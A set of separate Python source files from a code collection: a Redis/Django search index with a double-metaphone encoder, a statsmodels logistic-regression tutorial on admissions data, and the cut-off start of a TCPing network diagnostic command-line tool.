    # Phonetic normalisation: digit tokens pass through unchanged, others
    # become their (primary, secondary) double-metaphone codes.
    # NOTE(review): digit tokens are strings here, so the flatten below
    # iterates their characters and indexes individual digits - confirm
    # that is intended.
    words = map(lambda x: x if x.isdigit() else _double_metaphone(unicode(x)), words)
    words = [word for sublist in words for word in sublist if word]
    counts = collections.defaultdict(float)
    for word in words:
        counts[word] += 1
    return dict((word, count / len(words)) for word, count in counts.iteritems())
class _Result(dict):
    """A search hit: a dict of indexed field values plus a lazily fetched
    Django model instance resolved from the redis key ('app.model#pk[:field]')."""
    def __init__(self, *args, **kwargs):
        dict.__init__(self, *args, **kwargs)
        self._key = None       # redis key; assigned by Pyre._map_results
        self._instance = None  # cache for the `instance` property
    def __hash__(self):
        # Hash on app.model + pk so duplicate hits for the same object
        # collapse when deduplicated (see _unique usage in autocomplete).
        app_dot_model, pk, _ = _KEY.match(self._key).groups()
        return hash(app_dot_model + pk)
    @property
    def instance(self):
        """Fetch (once) and return the Django model instance for this hit."""
        if self._key and self._instance is None:
            app_dot_model, pk, _ = _KEY.match(self._key).groups()
            model = get_model(*app_dot_model.split('.'))
            self._instance = model.objects.get(pk=pk)
        return self._instance
class Pyre(object):
def __init__(self, *args, **kwargs):
self.redis = StrictRedis(*args, **kwargs)
def _map_results(self, keys):
if not keys:
return []
pipe = self.redis.pipeline()
for key in keys:
app_dot_model, pk, _ = _KEY.match(key).groups()
pipe.hgetall(app_dot_model + '#' + pk)
results = []
indexes = pipe.execute()
for i, index in enumerate(indexes):
for field, value in index.iteritems():
if not value:
continue
if value[0] == 'A':
index[field] = value[2:].split(',')
elif value[0] == 'M':
index[field] = int(value[2:])
elif value[0] == 'T':
index[field] = float(value[2:])
elif value[0] == 'B':
index[field] = bool(value[2:])
elif value[0] == 'I':
index[field] = int(value[2:])
elif value[0] == 'F':
index[field] = float(value[2:])
elif value[0] == 'S':
index[field] = value[2:]
else:
print '\033[93m', 'ERROR', field, value, '\033[0m'
result = _Result(index)
result._key = keys[i]
results.append(result)
return results
def get_all(self, model):
keys = self.redis.keys(model._meta.app_label + '.' + model._meta.module_name + '#*')
results = self._map_results(keys)
return results
def autocomplete(self, query):
keys = ['a:' + key for key in _unique(_get_words(query, weighted=False))]
if not keys:
return []
pipe = self.redis.pipeline()
for key in keys:
pipe.zrevrange(key, 0, -1, withscores=False)
ikeys = [ikey for sublist in pipe.execute() for ikey in sublist]
results = [result for result in _unique(self._map_results(ikeys))]
return results
def search(self, query, offset=0, count=10):
keys = ['w:' + key for key in _get_words(query)]
if not keys:
return []
indexed = max(self.redis.get('indexed'), 1)
pipe = self.redis.pipeline()
for key in keys:
pipe.zcard(key)
counts = pipe.execute()
ranks = [max(math.log(float(indexed) / count, 2), 0) if count else 0 for count in counts]
weights = dict((key, rank) for key, count, rank in zip(keys, counts, ranks) if count)
if not weights:
return []
temp_key = 'temp:' + os.urandom(8).encode('hex')
try:
self.redis.zunionstore(temp_key, weights)
keys = self.redis.zrevrange(temp_key, offset, offset+count-1, withscores=False)
finally:
self.redis.delete(temp_key)
results = self._map_results(keys)
return results
class SearchIndex(object):
def __init__(self, *args, **kwargs):
self.redis = StrictRedis(*args, **kwargs)
def index(self, value, uid=None, key='text', autocompletion=False, **kwargs):
if not uid:
uid = self.redis.incr('indexed')
self.redis.hset(uid, key, value)
pipe = self.redis.pipeline()
if autocompletion:
for i, word in enumerate(_get_words(value, weighted=False)):
for i, letter in enumerate(word):
if len(word) > i + 1:
pipe.zadd('a:' + word[:2+i], 0, uid+':'+word)
else:
for word, value in _get_words(value).iteritems():
pipe.zadd('w:' + word, value, uid)
pipe.execute()
def index_autocomplete(self, value, uid=None, key='text'):
self.index(value, uid, key, autocompletion=True)
if os.environ.get('DJANGO_SETTINGS_MODULE'):
from django.db.models import Model
from django.db.models.base import ModelBase
from django.db.models.manager import Manager
from django.db.models.loading import get_model
class DjangoSearchIndex(SearchIndex):
def __init__(self, source, **kwargs):
self.source = source
self.app_dot_model = source._meta.app_label + '.' + source._meta.module_name
self.redis = StrictRedis(**kwargs)
def index(self, *fields, **kwargs):
if isinstance(self.source, ModelBase):
instances = self.source.objects.all()
elif isinstance(self.source, Model):
instances = [self.source]
else:
raise ImportError('Only Model or Model instances are valid inputs')
for instance in instances:
if kwargs.get('everything'):
fields = chain( [field.name for field in instance._meta.fields],
[field.name for field in instance._meta._many_to_many()] )
for field in set(fields):
value = instance.__getattribute__(field)
if isinstance(value, Manager) and value.all():
value = 'A|' + ','.join([ str(obj.id) for obj in value.all() ])
elif isinstance(value, Model):
value = 'M|' + str(value.pk)
elif isinstance(value, datetime.date):
value = 'T|' + str(time.mktime(value.timetuple()))
elif isinstance(value, bool):
value = 'B|' + ('1' if value else '')
elif isinstance(value, int):
value = 'I|' + str(value)
elif isinstance(value, float):
value = 'F|' + str(value)
elif isinstance(value, basestring) and value:
value = 'S|' + value
else:
value = ''
super(DjangoSearchIndex, self).index(value,
self.app_dot_model + '#' + str(instance.id), field, **kwargs)
def index_autocomplete(self, *fields, **kwargs):
kwargs['autocompletion'] = True
self.index(*fields, **kwargs)
else:
class DjangoSearchIndex(SearchIndex):
def __init__(self, *args, **kwargs):
raise ImportError('DjangoSearchIndex only works in a django environment')
#https://github.com/dracos/double-metaphone
#http://atomboy.isa-geek.com/plone/Members/acoil/programing/double-metaphone/metaphone.py
# {{{
def _double_metaphone(st):
"""double_metaphone(string) -> (string, string or '')
returns the double metaphone codes for given string - always a tuple
there are no checks done on the input string, but it should be a single word or name."""
vowels = ['A', 'E', 'I', 'O', 'U', 'Y']
st = ''.join((c for c in unicodedata.normalize('NFD', st) if unicodedata.category(c) != 'Mn'))
st = st.upper() # st is short for string. I usually prefer descriptive over short, but this var is used a lot!
is_slavo_germanic = (st.find('W') > -1 or st.find('K') > -1 or st.find('CZ') > -1 or st.find('WITZ') > -1)
length = len(st)
first = 2
st = '-' * first + st + '------' # so we can index beyond the begining and end of the input string
last = first + length - 1
pos = first # pos is short for position
pri = sec = '' # primary and secondary metaphone codes
# skip these silent letters when at start of word
if st[first:first + 2] in ["GN", "KN", "PN", "WR", "PS"]:
pos += 1
# Initial 'X' is pronounced 'Z' e.g. 'Xavier'
if st[first] == 'X':
pri = sec = 'S' # 'Z' maps to 'S'
pos += 1
# main loop through chars in st
while pos <= last:
#print str(pos) + '\t' + st[pos]
ch = st[pos] # ch is short for character
# nxt (short for next characters in metaphone code) is set to a tuple of the next characters in
# the primary and secondary codes and how many characters to move forward in the string.
# the secondary code letter is given only when it is different than the primary.
# This is just a trick to make the code easier to write and read.
nxt = (None, 1) # default action is to add nothing and move to next char
if ch in vowels:
nxt = (None, 1)
if pos == first: # all init vowels now map to 'A'
nxt = ('A', 1)
elif ch == 'B':
#"-mb", e.g", "dumb", already skipped over... see 'M' below
if st[pos + 1] == 'B':
nxt = ('P', 2)
else:
nxt = ('P', 1)
elif ch == 'C':
# various germanic
if pos > first + 1 and st[pos - 2] not in vowels and st[pos - 1:pos + 2] == 'ACH' and \
st[pos + 2] not in ['I'] and (st[pos + 2] not in ['E'] or st[pos - 2:pos + 4] in ['BACHER', 'MACHER']):
nxt = ('K', 2)
# special case 'CAESAR'
elif pos == first and st[first:first + 6] == 'CAESAR':
nxt = ('S', 2)
elif st[pos:pos + 4] == 'CHIA': # italian 'chianti'
nxt = ('K', 2)
elif st[pos:pos + 2] == 'CH':
# find 'michael'
if pos > first and st[pos:pos + 4] == 'CHAE':
nxt = ('K', 'X', 2)
elif pos == first and (st[pos + 1:pos + 6] in ['HARAC', 'HARIS'] or \
st[pos + 1:pos + 4] in ["HOR", "HYM", "HIA", "HEM"]) and st[first:first + 5] != 'CHORE':
nxt = ('K', 2)
#germanic, greek, or otherwise 'ch' for 'kh' sound
elif st[first:first + 4] in ['VAN ', 'VON '] or st[first:first + 3] == 'SCH' \
or st[pos - 2:pos + 4] in ["ORCHES", "ARCHIT", "ORCHID"] \
or st[pos + 2] in ['T', 'S'] \
or ((st[pos - 1] in ["A", "O", "U", "E"] or pos == first) \
and st[pos + 2] in ["L", "R", "N", "M", "B", "H", "F", "V", "W"]):
nxt = ('K', 2)
else:
if pos > first:
if st[first:first + 2] == 'MC':
nxt = ('K', 2)
else:
nxt = ('X', 'K', 2)
else:
nxt = ('X', 2)
# e.g, 'czerny'
elif st[pos:pos + 2] == 'CZ' and st[pos - 2:pos + 2] != 'WICZ':
nxt = ('S', 'X', 2)
# e.g., 'focaccia'
elif st[pos + 1:pos + 4] == 'CIA':
nxt = ('X', 3)
# double 'C', but not if e.g. 'McClellan'
elif st[pos:pos + 2] == 'CC' and not (pos == (first + 1) and st[first] == 'M'):
#'bellocchio' but not 'bacchus'
if st[pos + 2] in ["I", "E", "H"] and st[pos + 2:pos + 4] != 'HU':
# 'accident', 'accede' 'succeed'
if (pos == (first + 1) and st[first] == 'A') or \
st[pos - 1:pos + 4] in ['UCCEE', 'UCCES']:
nxt = ('KS', 3)
# 'bacci', 'bertucci', other italian
else:
nxt = ('X', 3)
else:
nxt = ('K', 2)
elif st[pos:pos + 2] in ["CK", "CG", "CQ"]:
nxt = ('K', 2)
elif st[pos:pos + 2] in ["CI", "CE", "CY"]:
# italian vs. english
if st[pos:pos + 3] in ["CIO", "CIE", "CIA"]:
nxt = ('S', 'X', 2)
else:
nxt = ('S', 2)
else:
# name sent in 'mac caffrey', 'mac gregor
if st[pos + 1:pos + 3] in [" C", " Q", " G"]:
nxt = ('K', 3)
else:
if st[pos + 1] in ["C", "K", "Q"] and st[pos + 1:pos + 3] not in ["CE", "CI"]:
nxt = ('K', 2)
else: # default for 'C'
nxt = ('K', 1)
elif ch == u'\xc7': # will never get here with st.encode('ascii', 'replace') above
# \xc7 is UTF-8 encoding of Ç
nxt = ('S', 1)
elif ch == 'D':
if st[pos:pos + 2] == 'DG':
if st[pos + 2] in ['I', 'E', 'Y']: # e.g. 'edge'
nxt = ('J', 3)
else:
nxt = ('TK', 2)
elif st[pos:pos + 2] in ['DT', 'DD']:
nxt = ('T', 2)
else:
nxt = ('T', 1)
elif ch == 'F':
if st[pos + 1] == 'F':
nxt = ('F', 2)
else:
nxt = ('F', 1)
elif ch == 'G':
if st[pos + 1] == 'H':
if pos > first and st[pos - 1] not in vowels:
nxt = ('K', 2)
elif pos < (first + 3):
if pos == first: # 'ghislane', ghiradelli
if st[pos + 2] == 'I':
nxt = ('J', 2)
else:
nxt = ('K', 2)
# Parker's rule (with some further refinements) - e.g., 'hugh'
elif (pos > (first + 1) and st[pos - 2] in ['B', 'H', 'D']) \
or (pos > (first + 2) and st[pos - 3] in ['B', 'H', 'D']) \
or (pos > (first + 3) and st[pos - 3] in ['B', 'H']):
nxt = (None, 2)
else:
# e.g., 'laugh', 'McLaughlin', 'cough', 'gough', 'rough', 'tough'
if pos > (first + 2) and st[pos - 1] == 'U' \
and st[pos - 3] in ["C", "G", "L", "R", "T"]:
nxt = ('F', 2)
else:
if pos > first and st[pos - 1] != 'I':
nxt = ('K', 2)
elif st[pos + 1] == 'N':
if pos == (first + 1) and st[first] in vowels and not is_slavo_germanic:
nxt = ('KN', 'N', 2)
else:
# not e.g. 'cagney'
if st[pos + 2:pos + 4] != 'EY' and st[pos + 1] != 'Y' and not is_slavo_germanic:
nxt = ('N', 'KN', 2)
else:
nxt = ('KN', 2)
# 'tagliaro'
elif st[pos + 1:pos + 3] == 'LI' and not is_slavo_germanic:
nxt = ('KL', 'L', 2)
# -ges-,-gep-,-gel-, -gie- at beginning
elif pos == first and (st[pos + 1] == 'Y' \
or st[pos + 1:pos + 3] in ["ES", "EP", "EB", "EL", "EY", "IB", "IL", "IN", "IE", "EI", "ER"]):
nxt = ('K', 'J', 2)
# -ger-, -gy-
elif (st[pos + 1:pos + 3] == 'ER' or st[pos + 1] == 'Y') \
and st[first:first + 6] not in ["DANGER", "RANGER", "MANGER"] \
and st[pos - 1] not in ['E', 'I'] and st[pos - 1:pos + 2] not in ['RGY', 'OGY']:
nxt = ('K', 'J', 2)
# italian e.g, 'biaggi'
elif st[pos + 1] in ['E', 'I', 'Y'] or st[pos - 1:pos + 3] in ["AGGI", "OGGI"]:
# obvious germanic
if st[first:first + 4] in ['VON ', 'VAN '] or st[first:first + 3] == 'SCH' \
or st[pos + 1:pos + 3] == 'ET':
nxt = ('K', 2)
else:
# always soft if french ending
if st[pos + 1:pos + 5] == 'IER ':
nxt = ('J', 2)
else:
nxt = ('J', 'K', 2)
elif st[pos + 1] == 'G':
nxt = ('K', 2)
else:
nxt = ('K', 1)
elif ch == 'H':
# only keep if first & before vowel or btw. 2 vowels
if (pos == first or st[pos - 1] in vowels) and st[pos + 1] in vowels:
nxt = ('H', 2)
else: # (also takes care of 'HH')
nxt = (None, 1)
elif ch == 'J':
# obvious spanish, 'jose', 'san jacinto'
if st[pos:pos + 4] == 'JOSE' or st[first:first + 4] == 'SAN ':
if (pos == first and st[pos + 4] == ' ') or st[first:first + 4] == 'SAN ':
nxt = ('H', )
else:
nxt = ('J', 'H')
elif pos == first and st[pos:pos + 4] != 'JOSE':
nxt = ('J', 'A') # Yankelovich/Jankelowicz
else:
# spanish pron. of e.g. 'bajador'
if st[pos - 1] in vowels and not is_slavo_germanic \
and st[pos + 1] in ['A', 'O']:
nxt = ('J', 'H')
else:
if pos == last:
nxt = ('J', ' ')
else:
if st[pos + 1] not in ["L", "T", "K", "S", "N", "M", "B", "Z"] \
and st[pos - 1] not in ["S", "K", "L"]:
nxt = ('J', )
else:
nxt = (None, )
if st[pos + 1] == 'J':
nxt = nxt + (2, )
else:
nxt = nxt + (1, )
elif ch == 'K':
if st[pos + 1] == 'K':
nxt = ('K', 2)
else:
nxt = ('K', 1)
elif ch == 'L':
if st[pos + 1] == 'L':
# spanish e.g. 'cabrillo', 'gallegos'
if (pos == (last - 2) and st[pos - 1:pos + 3] in ["ILLO", "ILLA", "ALLE"]) \
or ((st[last - 1:last + 1] in ["AS", "OS"] or st[last] in ["A", "O"]) \
and st[pos - 1:pos + 3] == 'ALLE'):
nxt = ('L', ' ', 2)
else:
nxt = ('L', 2)
else:
nxt = ('L', 1)
elif ch == 'M':
if (st[pos + 1:pos + 4] == 'UMB' \
and (pos + 1 == last or st[pos + 2:pos + 4] == 'ER')) \
or st[pos + 1] == 'M':
nxt = ('M', 2)
else:
nxt = ('M', 1)
elif ch == 'N':
if st[pos + 1] == 'N':
nxt = ('N', 2)
else:
nxt = ('N', 1)
elif ch == u'\xd1': # UTF-8 encoding of ト
nxt = ('N', 1)
elif ch == 'P':
if st[pos + 1] == 'H':
nxt = ('F', 2)
elif st[pos + 1] in ['P', 'B']: # also account for "campbell", "raspberry"
nxt = ('P', 2)
else:
nxt = ('P', 1)
elif ch == 'Q':
if st[pos + 1] == 'Q':
nxt = ('K', 2)
else:
nxt = ('K', 1)
elif ch == 'R':
# french e.g. 'rogier', but exclude 'hochmeier'
if pos == last and not is_slavo_germanic \
and st[pos - 2:pos] == 'IE' and st[pos - 4:pos - 2] not in ['ME', 'MA']:
nxt = ('', 'R')
else:
nxt = ('R', )
if st[pos + 1] == 'R':
nxt = nxt + (2, )
else:
nxt = nxt + (1, )
elif ch == 'S':
# special cases 'island', 'isle', 'carlisle', 'carlysle'
if st[pos - 1:pos + 2] in ['ISL', 'YSL']:
nxt = (None, 1)
# special case 'sugar-'
elif pos == first and st[first:first + 5] == 'SUGAR':
nxt = ('X', 'S', 1)
elif st[pos:pos + 2] == 'SH':
# germanic
if st[pos + 1:pos + 5] in ["HEIM", "HOEK", "HOLM", "HOLZ"]:
nxt = ('S', 2)
else:
nxt = ('X', 2)
# italian & armenian
elif st[pos:pos + 3] in ["SIO", "SIA"] or st[pos:pos + 4] == 'SIAN':
if not is_slavo_germanic:
nxt = ('S', 'X', 3)
else:
nxt = ('S', 3)
# german & anglicisations, e.g. 'smith' match 'schmidt', 'snider' match 'schneider'
# also, -sz- in slavic language altho in hungarian it is pronounced 's'
elif (pos == first and st[pos + 1] in ["M", "N", "L", "W"]) or st[pos + 1] == 'Z':
nxt = ('S', 'X')
if st[pos + 1] == 'Z':
nxt = nxt + (2, )
else:
nxt = nxt + (1, )
elif st[pos:pos + 2] == 'SC':
# Schlesinger's rule
if st[pos + 2] == 'H':
# dutch origin, e.g. 'school', 'schooner'
if st[pos + 3:pos + 5] in ["OO", "ER", "EN", "UY", "ED", "EM"]:
# 'schermerhorn', 'schenker'
if st[pos + 3:pos + 5] in ['ER', 'EN']:
nxt = ('X', 'SK', 3)
else:
nxt = ('SK', 3)
else:
if pos == first and st[first + 3] not in vowels and st[first + 3] != 'W':
nxt = ('X', 'S', 3)
else:
nxt = ('X', 3)
elif st[pos + 2] in ['I', 'E', 'Y']:
nxt = ('S', 3)
else:
nxt = ('SK', 3)
# french e.g. 'resnais', 'artois'
elif pos == last and st[pos - 2:pos] in ['AI', 'OI']:
nxt = ('', 'S', 1)
else:
nxt = ('S', )
if st[pos + 1] in ['S', 'Z']:
nxt = nxt + (2, )
else:
nxt = nxt + (1, )
elif ch == 'T':
if st[pos:pos + 4] == 'TION':
nxt = ('X', 3)
elif st[pos:pos + 3] in ['TIA', 'TCH']:
nxt = ('X', 3)
elif st[pos:pos + 2] == 'TH' or st[pos:pos + 3] == 'TTH':
# special case 'thomas', 'thames' or germanic
if st[pos + 2:pos + 4] in ['OM', 'AM'] or st[first:first + 4] in ['VON ', 'VAN '] \
or st[first:first + 3] == 'SCH':
nxt = ('T', 2)
else:
nxt = ('0', 'T', 2)
elif st[pos + 1] in ['T', 'D']:
nxt = ('T', 2)
else:
nxt = ('T', 1)
elif ch == 'V':
if st[pos + 1] == 'V':
nxt = ('F', 2)
else:
nxt = ('F', 1)
elif ch == 'W':
# can also be in middle of word
if st[pos:pos + 2] == 'WR':
nxt = ('R', 2)
elif pos == first and (st[pos + 1] in vowels or st[pos:pos + 2] == 'WH'):
# Wasserman should match Vasserman
if st[pos + 1] in vowels:
nxt = ('A', 'F', 1)
else:
nxt = ('A', 1)
# Arnow should match Arnoff
elif (pos == last and st[pos - 1] in vowels) \
or st[pos - 1:pos + 4] in ["EWSKI", "EWSKY", "OWSKI", "OWSKY"] \
or st[first:first + 3] == 'SCH':
nxt = ('', 'F', 1)
# polish e.g. 'filipowicz'
elif st[pos:pos + 4] in ["WICZ", "WITZ"]:
nxt = ('TS', 'FX', 4)
else: # default is to skip it
nxt = (None, 1)
elif ch == 'X':
# french e.g. breaux
nxt = (None, )
if not(pos == last and (st[pos - 3:pos] in ["IAU", "EAU"] \
or st[pos - 2:pos] in ['AU', 'OU'])):
nxt = ('KS', )
if st[pos + 1] in ['C', 'X']:
nxt = nxt + (2, )
else:
nxt = nxt + (1, )
elif ch == 'Z':
# chinese pinyin e.g. 'zhao'
if st[pos + 1] == 'H':
nxt = ('J', )
elif st[pos + 1:pos + 3] in ["ZO", "ZI", "ZA"] \
or (is_slavo_germanic and pos > first and st[pos - 1] != 'T'):
nxt = ('S', 'TS')
else:
nxt = ('S', )
if st[pos + 1] == 'Z' or st[pos + 1] == 'H':
nxt = nxt + (2, )
else:
nxt = nxt + (1, )
# ----------------------------------
# --- end checking letters------
# ----------------------------------
#print str(nxt)
if len(nxt) == 2:
if nxt[0]:
pri += nxt[0]
sec += nxt[0]
pos += nxt[1]
elif len(nxt) == 3:
if nxt[0]:
pri += nxt[0]
if nxt[1]:
sec += nxt[1]
pos += nxt[2]
if pri == sec:
return (pri, '')
else:
return (pri, sec)
#}}}
|
991,643 | 75a4ca0c9e55c364889d5917dd7d6d040d74cd95 |
# http://blog.yhathq.com/posts/logistic-regression-and-python.html
import pandas as pd
import statsmodels.api as sm
import pylab as pl
import numpy as np
def cartesian(arrays, out=None):
    """
    Generate a cartesian product of input arrays.
    Parameters
    ----------
    arrays : list of array-like
        1-D arrays to form the cartesian product of.
    out : ndarray
        Array to place the cartesian product in.
    Returns
    -------
    out : ndarray
        2-D array of shape (M, len(arrays)) containing cartesian products
        formed of input arrays.
    Examples
    --------
    >>> cartesian(([1, 2, 3], [4, 5], [6, 7]))
    array([[1, 4, 6],
           [1, 4, 7],
           [1, 5, 6],
           [1, 5, 7],
           [2, 4, 6],
           [2, 4, 7],
           [2, 5, 6],
           [2, 5, 7],
           [3, 4, 6],
           [3, 4, 7],
           [3, 5, 6],
           [3, 5, 7]])
    """
    arrays = [np.asarray(x) for x in arrays]
    dtype = arrays[0].dtype
    # Coerce to a plain int: np.prod returns a numpy scalar.
    n = int(np.prod([x.size for x in arrays]))
    if out is None:
        out = np.zeros([n, len(arrays)], dtype=dtype)
    # Floor division: `/` yields a float on Python 3, which breaks the
    # np.repeat count and the slice bounds below.
    m = n // arrays[0].size
    # First column: each element of arrays[0] repeated over its sub-block.
    out[:, 0] = np.repeat(arrays[0], m)
    if arrays[1:]:
        # Fill the first sub-block recursively, then tile it for the rest.
        cartesian(arrays[1:], out=out[0:m, 1:])
        for j in range(1, arrays[0].size):
            out[j * m:(j + 1) * m, 1:] = out[0:m, 1:]
    return out
# read the data in
# df = pd.read_csv("http://www.ats.ucla.edu/stat/data/binary.csv")
df = pd.read_csv("../../../r/stats/binary.csv")
# take a look at the dataset
print((df.head()))
# admit gre gpa rank
# 0 0 380 3.61 3
# 1 1 660 3.67 3
# 2 1 800 4.00 1
# 3 1 640 3.19 4
# 4 0 520 2.93 4
# rename the 'rank' column because there is also a DataFrame method called
# 'rank'
df.columns = ["admit", "gre", "gpa", "prestige"]
print((df.columns))
# array([admit, gre, gpa, prestige], dtype=object)
# dummify rank
dummy_ranks = pd.get_dummies(df['prestige'], prefix='prestige')
print(dummy_ranks.head())
# prestige_1 prestige_2 prestige_3 prestige_4
# 0 0 0 1 0
# 1 0 0 1 0
# 2 1 0 0 0
# 3 0 0 0 1
# 4 0 0 0 1
# create a clean data frame for the regression
cols_to_keep = ['admit', 'gre', 'gpa']
data = df[cols_to_keep].join(dummy_ranks.ix[:, 'prestige_2':])
print(data.head())
# admit gre gpa prestige_2 prestige_3 prestige_4
# 0 0 380 3.61 0 1 0
# 1 1 660 3.67 0 1 0
# 2 1 800 4.00 0 0 0
# 3 1 640 3.19 0 0 1
# 4 0 520 2.93 0 0 1
# manually add the intercept
data['intercept'] = 1.0
train_cols = data.columns[1:]
# Index([gre, gpa, prestige_2, prestige_3, prestige_4], dtype=object)
logit = sm.Logit(data['admit'], data[train_cols])
# fit the model
result = logit.fit()
# cool enough to deserve it's own gist
print(result.summary())
# look at the confidence interval of each coeffecient
print(result.conf_int())
# 0 1
# gre 0.000120 0.004409
# gpa 0.153684 1.454391
# prestige_2 -1.295751 -0.055135
# prestige_3 -2.016992 -0.663416
# prestige_4 -2.370399 -0.732529
# intercept -6.224242 -1.755716
# odds ratios and 95% CI
params = result.params
conf = result.conf_int()
conf['OR'] = params
conf.columns = ['2.5%', '97.5%', 'OR']
print(np.exp(conf))
# 2.5% 97.5% OR
# gre 1.000120 1.004418 1.002267
# gpa 1.166122 4.281877 2.234545
# prestige_2 0.273692 0.946358 0.508931
# prestige_3 0.133055 0.515089 0.261792
# prestige_4 0.093443 0.480692 0.211938
# intercept 0.001981 0.172783 0.018500
# instead of generating all possible values of GRE and GPA, we're going
# to use an evenly spaced range of 10 values from the min to the max
gres = np.linspace(data['gre'].min(), data['gre'].max(), 10)
print(gres)
# array([ 220. , 284.44444444, 348.88888889, 413.33333333,
# 477.77777778, 542.22222222, 606.66666667, 671.11111111,
# 735.55555556, 800. ])
gpas = np.linspace(data['gpa'].min(), data['gpa'].max(), 10)
print(gpas)
# array([ 2.26 , 2.45333333, 2.64666667, 2.84 , 3.03333333,
# 3.22666667, 3.42 , 3.61333333, 3.80666667, 4. ])
# enumerate all possibilities
combos = pd.DataFrame(cartesian([gres, gpas, [1, 2, 3, 4], [1.]]))
# recreate the dummy variables
combos.columns = ['gre', 'gpa', 'prestige', 'intercept']
dummy_ranks = pd.get_dummies(combos['prestige'], prefix='prestige')
dummy_ranks.columns = ['prestige_1', 'prestige_2', 'prestige_3', 'prestige_4']
# keep only what we need for making predictions
cols_to_keep = ['gre', 'gpa', 'prestige', 'intercept']
combos = combos[cols_to_keep].join(dummy_ranks.ix[:, 'prestige_2':])
# make predictions on the enumerated dataset
combos['admit_pred'] = result.predict(combos[train_cols])
print(combos.head())
# gre gpa prestige intercept prestige_2 prestige_3 prestige_4 admit_pred
# 0 220 2.260000 1 1 0 0 0 0.157801
# 1 220 2.260000 2 1 1 0 0 0.087056
# 2 220 2.260000 3 1 0 1 0 0.046758
# 3 220 2.260000 4 1 0 0 1 0.038194
# 4 220 2.453333 1 1 0 0
# 0 0.179574
def isolate_and_plot(variable, image_file):
    """Plot mean predicted admission probability against `variable`
    (one curve per prestige level 1-4) and save the figure to `image_file`.

    Relies on the module-level `combos` frame built above, which already
    carries an `admit_pred` column.
    """
    # isolate the chosen variable and class rank; `rows=` is the legacy
    # pandas pivot_table keyword this script was written against
    grouped = pd.pivot_table(combos, values=['admit_pred'], rows=[variable, 'prestige'],
                            aggfunc=np.mean)
    # one colored line per prestige level
    colors = 'rbgyrbgy'
    for col in combos.prestige.unique():
        plt_data = grouped.ix[grouped.index.get_level_values(1) == col]
        pl.plot(plt_data.index.get_level_values(0), plt_data['admit_pred'],
                color=colors[int(col)])
    pl.xlabel(variable)
    pl.ylabel("P(admit=1)")
    pl.legend(['1', '2', '3', '4'], loc='upper left', title='Prestige')
    # fixed typo in the title: "presitge" -> "prestige"
    pl.title("Prob(admit=1) isolating " + variable + " and prestige")
    # BUG FIX: savefig must run BEFORE show() — show() hands the figure to
    # the GUI event loop and, in non-interactive runs, destroys it, so
    # calling savefig afterwards wrote a blank image
    pl.savefig(image_file)
    pl.show()

isolate_and_plot('gre', 'gre.png')
isolate_and_plot('gpa', 'gpa.png')
|
991,644 | cde85c40185b0c9aab24df850199076d549fda26 | import socket
import argparse
from resources import TCPing, Statistics, Visualiser, SocketAPI, Timer
import sys
import signal
def parse_args():
    """Build the CLI parser, parse sys.argv and collect every ping target.

    Returns a tuple ``(namespace, targets)`` where ``targets`` is the list
    of ``(ip, port)`` pairs from ``--add`` plus the main destination.
    """
    parser = argparse.ArgumentParser(description='TCPing console app')
    parser.add_argument('dest_ip', metavar='dest_ip', type=check_ip,
                        help='Destination ip address')
    parser.add_argument('dest_port', metavar='dest_port',
                        type=check_non_negative_int,
                        help='Destination port address')
    parser.add_argument('-t', '--timeout', type=check_non_negative_float,
                        default=3, help='Timeout for waiting packets')
    parser.add_argument('-p', '--packet', type=check_non_negative_int,
                        default=3, help='Count of packets')
    parser.add_argument('-i', '--interval', type=check_non_negative_float,
                        default=1, help='Packet sending interval')
    parser.add_argument('-u', '--unlimited', action='store_true',
                        help='Property for unlimited count of pings. '
                             'You can get statistics by SIGUSR1')
    parser.add_argument('-a', '--add', metavar=('HOST', 'PORT'), nargs=2,
                        action='append', help='Add another address for ping')
    parser.add_argument('-v', action='store_true',
                        help='Shows time for every packet')
    parser.add_argument('-P', '--source_port', type=check_port, default=0,
                        help='source port for sending packets (default is 0)')
    namespace = parser.parse_args()
    targets = parse_additional_address(namespace.add)
    targets.append((namespace.dest_ip, namespace.dest_port))
    return namespace, targets
def check_port(port):
    """argparse ``type`` hook: parse *port* and require 0 <= port <= 65535.

    Returns the port as an int; raises ``argparse.ArgumentTypeError`` for
    out-of-range values.
    """
    # parse once instead of calling int(port) three times as before
    value = int(port)
    if not 0 <= value <= 65535:
        # BUG FIX: the original raised the exception CLASS with no message;
        # instantiating it with text gives argparse a readable CLI error
        raise argparse.ArgumentTypeError(
            f"{port} is an invalid port number (expected 0-65535)")
    return value
def check_ip(ip):
    """argparse ``type`` hook: resolve a hostname (or dotted quad) to an
    IPv4 address string; ``socket.gaierror`` propagates on failure."""
    return socket.gethostbyname(ip)
def check_non_negative_int(value):
    """argparse ``type`` hook: parse *value* as an int and reject negatives."""
    parsed = int(value)
    if parsed >= 0:
        return parsed
    raise argparse.ArgumentTypeError(
        f"{value} is an invalid positive int value")
def check_non_negative_float(value):
    """argparse ``type`` hook: parse *value* as a float and reject negatives."""
    parsed = float(value)
    if parsed >= 0:
        return parsed
    raise argparse.ArgumentTypeError(
        f"{value} is an invalid positive float value")
def parse_additional_address(address_list):
    """Resolve every ``(host, port)`` pair collected via ``--add``.

    Malformed entries are reported on stderr and dropped instead of
    aborting the whole run. Returns a list of ``(ip, port)`` tuples.
    """
    if not address_list:
        return []
    parsed = []
    for entry in address_list:
        try:
            parsed.append(parse_address(entry))
        except Exception:
            sys.stderr.write(
                'Wrong additional address {}'.format(' '.join(entry)))
    return parsed
def parse_address(address):
    """Resolve a ``(host, port)`` pair of strings into ``(ip, int_port)``.

    Raises:
        socket.gaierror: if the host cannot be resolved.
        ValueError: if the port is not an int in [0, 65535].
    """
    host, port = address
    ip = socket.gethostbyname(host)
    port = int(port)
    if not 0 <= port <= 65535:
        # give the ValueError a message so callers can report something useful
        raise ValueError('port must be in range 0-65535, got {}'.format(port))
    return ip, port
if __name__ == "__main__":
    # The tool relies on POSIX signals (SIGUSR1), so Windows is rejected up front.
    if sys.platform == 'win32':
        sys.stderr.write('Windows don\'t supported\n')
        sys.exit(1)
    parsed, address = parse_args()
    source_port = parsed.source_port
    # -v switches to per-packet timing output; otherwise the compact
    # stream visualiser (which needs the timeout to render) is used
    if parsed.v:
        visualiser = Visualiser.TimeVisualiser()
    else:
        visualiser = Visualiser.StreamVisualiser(parsed.timeout)
    # per-address statistics: packet status plus min/max/average round-trip time
    stats = Statistics.AddressStatManager(
        (Statistics.PacketStatusStat, Statistics.MinTimeStat,
         Statistics.MaxTimeStat, Statistics.AverageTimeStat))
    sock = SocketAPI.SocketAPI()
    timer = Timer.Timer()
    program = TCPing.TCPing(
        source_port,
